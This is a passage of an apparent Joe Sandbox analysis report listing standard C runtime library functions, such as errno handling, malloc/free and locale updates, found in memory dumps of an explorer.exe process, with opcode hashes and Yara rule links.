                                                                                                                                                                                                                                  • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1573762532-0
                                                                                                                                                                                                                                  • Opcode ID: 4aa4f35c8a007f48027b2b67f18f1a3b64875e70c6862a2dee90e798f9fa5a3d
                                                                                                                                                                                                                                  • Instruction ID: a107880f9b724878d9483d435bb565c57ca9eac8faea81b08b7c22d819e8b4e2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4aa4f35c8a007f48027b2b67f18f1a3b64875e70c6862a2dee90e798f9fa5a3d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DC414934518A7ECBDB78AB1D805037173E0FB04327B98423EF8D6C3A94DA2CC8828781
                                                                                                                                                                                                                                  Function 0AE583F9 Relevance: 10.7, APIs: 7, Instructions: 180COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0AE58424
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0AE58419
                                                                                                                                                                                                                                    • Part of subcall function 0AE4F4DD: _getptd_noexit.LIBCMT ref: 0AE4F4E1
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0AE584C7
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0AE584D2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2548665098.000000000AE30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0AE30000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_ae30000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1573762532-0
                                                                                                                                                                                                                                  • Opcode ID: 4aa4f35c8a007f48027b2b67f18f1a3b64875e70c6862a2dee90e798f9fa5a3d
                                                                                                                                                                                                                                  • Instruction ID: 0d8ca600af1313aee012bc61addf60b0ffae1e384be73fa448a93500b81fed86
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4aa4f35c8a007f48027b2b67f18f1a3b64875e70c6862a2dee90e798f9fa5a3d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C6415C30528A5E8BDB64BF39B0502B673D0FB14359B99632FECD6C7191EB24C442AB81
                                                                                                                                                                                                                                  Function 0B3183F9 Relevance: 10.7, APIs: 7, Instructions: 180COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0B318424
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0B318419
                                                                                                                                                                                                                                    • Part of subcall function 0B30F4DD: _getptd_noexit.LIBCMT ref: 0B30F4E1
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0B3184C7
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0B3184D2
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2549414053.000000000B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b2f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1573762532-0
                                                                                                                                                                                                                                  • Opcode ID: 4aa4f35c8a007f48027b2b67f18f1a3b64875e70c6862a2dee90e798f9fa5a3d
                                                                                                                                                                                                                                  • Instruction ID: b430c12c0ccea32af1933b8eee377b0867a68529aa605e180fefc331f806de61
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4aa4f35c8a007f48027b2b67f18f1a3b64875e70c6862a2dee90e798f9fa5a3d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59415B30958E5E8FCB6CAB1980512B573D9FB04355BB80A2FE8D6C3190EE24C8428785
                                                                                                                                                                                                                                  Function 0E0F05C4 Relevance: 10.7, APIs: 7, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _malloc_crt.LIBCMT ref: 0E0F05ED
                                                                                                                                                                                                                                    • Part of subcall function 0E0EE41C: malloc.LIBCMT ref: 0E0EE447
                                                                                                                                                                                                                                    • Part of subcall function 0E0EE41C: Sleep.KERNEL32 ref: 0E0EE45A
                                                                                                                                                                                                                                  • free.LIBCMT ref: 0E0F06EE
                                                                                                                                                                                                                                  • free.LIBCMT ref: 0E0F070A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$Sleep_malloc_crtmalloc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2523592665-0
                                                                                                                                                                                                                                  • Opcode ID: 16a1c2340516a5aa0e6a5305e36d83b2915ea91075ceaf017377b6381f8428a9
                                                                                                                                                                                                                                  • Instruction ID: 7b2fe802cdf061cbdb1345abefd1f6d05bc2e303c87f60f67d5532fb7172dd60
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 16a1c2340516a5aa0e6a5305e36d83b2915ea91075ceaf017377b6381f8428a9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 17519A36705B8092EB24EF16E99035A73A4F788BA8F444525DF5D47F11EF38C8B68740
                                                                                                                                                                                                                                  Function 0DF405C4 Relevance: 10.7, APIs: 7, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _malloc_crt.LIBCMT ref: 0DF405ED
                                                                                                                                                                                                                                    • Part of subcall function 0DF3E41C: malloc.LIBCMT ref: 0DF3E447
                                                                                                                                                                                                                                    • Part of subcall function 0DF3E41C: Sleep.KERNEL32 ref: 0DF3E45A
                                                                                                                                                                                                                                  • free.LIBCMT ref: 0DF406EE
                                                                                                                                                                                                                                  • free.LIBCMT ref: 0DF4070A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$Sleep_malloc_crtmalloc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2523592665-0
                                                                                                                                                                                                                                  • Opcode ID: 16a1c2340516a5aa0e6a5305e36d83b2915ea91075ceaf017377b6381f8428a9
                                                                                                                                                                                                                                  • Instruction ID: 36e18b580d1845940a8f3b86e06579de9a06510cda92c74abb7a29d73772d297
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 16a1c2340516a5aa0e6a5305e36d83b2915ea91075ceaf017377b6381f8428a9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A7518E26705B4093EB21EF5AF95072A77A4F788BA8F45C1299F4D47B10EF38C4668744
                                                                                                                                                                                                                                  Function 102105C4 Relevance: 10.7, APIs: 7, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _malloc_crt.LIBCMT ref: 102105ED
                                                                                                                                                                                                                                    • Part of subcall function 1020E41C: malloc.LIBCMT ref: 1020E447
                                                                                                                                                                                                                                    • Part of subcall function 1020E41C: Sleep.KERNEL32 ref: 1020E45A
                                                                                                                                                                                                                                  • free.LIBCMT ref: 102106EE
                                                                                                                                                                                                                                  • free.LIBCMT ref: 1021070A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: free$Sleep_malloc_crtmalloc
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2523592665-0
                                                                                                                                                                                                                                  • Opcode ID: 16a1c2340516a5aa0e6a5305e36d83b2915ea91075ceaf017377b6381f8428a9
                                                                                                                                                                                                                                  • Instruction ID: aa1f992e3368847355ad8e1eb4bce2f20be03c4d63fbe9cbb81f42a9de76a4be
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 16a1c2340516a5aa0e6a5305e36d83b2915ea91075ceaf017377b6381f8428a9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D951BC36301B4592EB10EF56E99035A73A4F788B98F544125EF9C4BB14DFBCD8B68B40
                                                                                                                                                                                                                                  Function 08A28285 Relevance: 10.6, APIs: 7, Instructions: 146COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 08A282AB
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 08A282A0
                                                                                                                                                                                                                                    • Part of subcall function 08A1F4DD: _getptd_noexit.LIBCMT ref: 08A1F4E1
                                                                                                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 08A2832A
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 08A2833B
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 08A28346
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2542811309.0000000008A00000.00000040.00000001.00020000.00000000.sdmp, Offset: 08A00000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_8a00000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 781512312-0
                                                                                                                                                                                                                                  • Opcode ID: d74b0406f0a1727252c71317ceadebb1e7f12b024ce98a0ef4cb5b3858afa133
                                                                                                                                                                                                                                  • Instruction ID: 2c0d19321592a8ccc9cf327694886fc621db8fdf1ece8c473fe479c4e8f131fc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d74b0406f0a1727252c71317ceadebb1e7f12b024ce98a0ef4cb5b3858afa133
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85413634514A3ACBCF74EB1D84543B6B3E1FB58323B94467EF4A6C7994EA2C8492D341
                                                                                                                                                                                                                                  Function 0AE58285 Relevance: 10.6, APIs: 7, Instructions: 146COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0AE582AB
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0AE582A0
                                                                                                                                                                                                                                    • Part of subcall function 0AE4F4DD: _getptd_noexit.LIBCMT ref: 0AE4F4E1
                                                                                                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0AE5832A
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0AE5833B
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0AE58346
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2548665098.000000000AE30000.00000040.00000400.00020000.00000000.sdmp, Offset: 0AE30000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_ae30000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 781512312-0
                                                                                                                                                                                                                                  • Opcode ID: d74b0406f0a1727252c71317ceadebb1e7f12b024ce98a0ef4cb5b3858afa133
                                                                                                                                                                                                                                  • Instruction ID: 5dae36bcbec879d892fbf7baf31de21d06a82d44e6c375267a524510399a4c1d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d74b0406f0a1727252c71317ceadebb1e7f12b024ce98a0ef4cb5b3858afa133
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5418C30524A1A8BCB64EF3DE4542B5B3E0FB54329B88266EDCD5C7194EB24C482EB41
                                                                                                                                                                                                                                  Function 0B318285 Relevance: 10.6, APIs: 7, Instructions: 146COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0B3182AB
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0B3182A0
                                                                                                                                                                                                                                    • Part of subcall function 0B30F4DD: _getptd_noexit.LIBCMT ref: 0B30F4E1
                                                                                                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0B31832A
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0B31833B
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0B318346
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2549414053.000000000B2F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_b2f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 781512312-0
                                                                                                                                                                                                                                  • Opcode ID: d74b0406f0a1727252c71317ceadebb1e7f12b024ce98a0ef4cb5b3858afa133
                                                                                                                                                                                                                                  • Instruction ID: a106173f5973050b5da943c2948a197a6e36005cbcbfee5b8d4dd954c78d5269
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d74b0406f0a1727252c71317ceadebb1e7f12b024ce98a0ef4cb5b3858afa133
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F6413B34914A1A8FCB6CEB1984942B5B3E5FF54321BB80E6ED4D5C7194EB34C482D745
                                                                                                                                                                                                                                  Function 0E0F8AC4 Relevance: 10.6, APIs: 7, Instructions: 122COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0E0F8AEF
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0E0F8AE4
                                                                                                                                                                                                                                    • Part of subcall function 0E0EFBA8: _getptd_noexit.LIBCMT ref: 0E0EFBAC
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0E0F8B92
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0E0F8B9D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1573762532-0
                                                                                                                                                                                                                                  • Opcode ID: 4aa4f35c8a007f48027b2b67f18f1a3b64875e70c6862a2dee90e798f9fa5a3d
                                                                                                                                                                                                                                  • Instruction ID: 2ecf630ae8a8fe47632e92401c67cb289ac0891905fc340726aa8cea765d7f22
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4aa4f35c8a007f48027b2b67f18f1a3b64875e70c6862a2dee90e798f9fa5a3d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3541E4B2A12295C6DFA89B2295602FD73E0F740BD5B88C126DB9557F84D738C962C720
                                                                                                                                                                                                                                  Function 0DF48AC4 Relevance: 10.6, APIs: 7, Instructions: 122COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0DF48AEF
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0DF48AE4
                                                                                                                                                                                                                                    • Part of subcall function 0DF3FBA8: _getptd_noexit.LIBCMT ref: 0DF3FBAC
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0DF48B92
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0DF48B9D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1573762532-0
                                                                                                                                                                                                                                  • Opcode ID: 4aa4f35c8a007f48027b2b67f18f1a3b64875e70c6862a2dee90e798f9fa5a3d
                                                                                                                                                                                                                                  • Instruction ID: 71c0548d6bc725c7b3dd7d3601e47201482709d7af71ac6175a2539728ad8155
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4aa4f35c8a007f48027b2b67f18f1a3b64875e70c6862a2dee90e798f9fa5a3d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE4147B2E023958ADF249B2996506BD7BA0F740BD5F99C126DFD957A84DB38C191C300
                                                                                                                                                                                                                                  Function 10218AC4 Relevance: 10.6, APIs: 7, Instructions: 122COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 10218AEF
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 10218AE4
                                                                                                                                                                                                                                    • Part of subcall function 1020FBA8: _getptd_noexit.LIBCMT ref: 1020FBAC
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 10218B92
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 10218B9D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _errno_invalid_parameter_noinfo$_getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1573762532-0
                                                                                                                                                                                                                                  • Opcode ID: 4aa4f35c8a007f48027b2b67f18f1a3b64875e70c6862a2dee90e798f9fa5a3d
                                                                                                                                                                                                                                  • Instruction ID: d2e9c3d712147690ad2b5f67a2fc7d453896db0e66f536a0f9b2e1ea966d3b03
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4aa4f35c8a007f48027b2b67f18f1a3b64875e70c6862a2dee90e798f9fa5a3d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D84125B6A0539686DF589F1291D027A73E0F740BD8BA04116EFD45FA84D7B8CAE1C710
                                                                                                                                                                                                                                  Function 0E0F8950 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0E0F8976
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0E0F896B
                                                                                                                                                                                                                                    • Part of subcall function 0E0EFBA8: _getptd_noexit.LIBCMT ref: 0E0EFBAC
                                                                                                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0E0F89F5
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0E0F8A06
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0E0F8A11
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2554476767.000000000E0D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0E0D0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E119000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2554476767.000000000E11B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_e0d0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 781512312-0
                                                                                                                                                                                                                                  • Opcode ID: d74b0406f0a1727252c71317ceadebb1e7f12b024ce98a0ef4cb5b3858afa133
                                                                                                                                                                                                                                  • Instruction ID: 7adcd26ca1cf5a3077554c7759c8b88a50919d0102b9db849fcbe0cb1aa68817
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d74b0406f0a1727252c71317ceadebb1e7f12b024ce98a0ef4cb5b3858afa133
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8931E8726146A6C6EF689B1295602FD73E0EB40BE5B98C126DBD41BF84D73CCD61C720
                                                                                                                                                                                                                                  Function 0DF48950 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0DF48976
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0DF4896B
                                                                                                                                                                                                                                    • Part of subcall function 0DF3FBA8: _getptd_noexit.LIBCMT ref: 0DF3FBAC
                                                                                                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0DF489F5
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 0DF48A06
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 0DF48A11
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2553708024.000000000DF20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0DF20000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF69000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2553708024.000000000DF6B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_df20000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 781512312-0
                                                                                                                                                                                                                                  • Opcode ID: d74b0406f0a1727252c71317ceadebb1e7f12b024ce98a0ef4cb5b3858afa133
                                                                                                                                                                                                                                  • Instruction ID: a7e5afb52dc8a7f89f2cafa405627665f81bdd5d70e9a908381d932ab38a52ce
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d74b0406f0a1727252c71317ceadebb1e7f12b024ce98a0ef4cb5b3858afa133
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19318A72E156A282DF24AB1E94502BD7BA0F740FE4F99C126EBD41FB84D778C951C710
                                                                                                                                                                                                                                  Function 10218950 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 10218976
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 1021896B
                                                                                                                                                                                                                                    • Part of subcall function 1020FBA8: _getptd_noexit.LIBCMT ref: 1020FBAC
                                                                                                                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 102189F5
                                                                                                                                                                                                                                  • _errno.LIBCMT ref: 10218A06
                                                                                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 10218A11
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000007.00000002.2555399340.00000000101F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 101F0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.0000000010239000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000007.00000002.2555399340.000000001023B000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_101f0000_explorer.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Locale_errno_invalid_parameter_noinfo$UpdateUpdate::__getptd_noexit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 781512312-0
                                                                                                                                                                                                                                  • Opcode ID: d74b0406f0a1727252c71317ceadebb1e7f12b024ce98a0ef4cb5b3858afa133
                                                                                                                                                                                                                                  • Instruction ID: 7b77facc1662caa5bc3dc7a300d69fa3c06f7dc4cb6590e3be199b04eb36da7a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d74b0406f0a1727252c71317ceadebb1e7f12b024ce98a0ef4cb5b3858afa133
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7310476A147A782DB549F1294902BD73E1EB50BE5BA14127EBD40FB88D7B8C9F1CB00
                                                                                                                                                                                                                                  Function 08A213F0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 08A2141B
                                                                                                                                                                                                                                  • __DestructExceptionObject.LIBCMT ref: 08A214A5
